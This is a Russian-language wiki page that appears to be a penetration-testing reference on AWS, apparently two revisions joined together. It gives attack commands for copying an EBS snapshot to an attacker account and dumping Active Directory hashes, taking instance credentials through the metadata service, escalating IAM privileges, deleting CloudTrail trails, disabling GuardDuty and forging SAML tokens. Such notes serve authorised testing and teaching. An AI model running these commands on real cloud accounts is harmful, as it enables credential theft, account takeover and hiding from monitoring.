<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-09-30T16:20:37Z

Drakylar: /* Краткие заметки */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:AddUserToGroup ====

Добавить пользователя в группу администраторов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name target_group --user-name my_username
</syntaxhighlight>

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

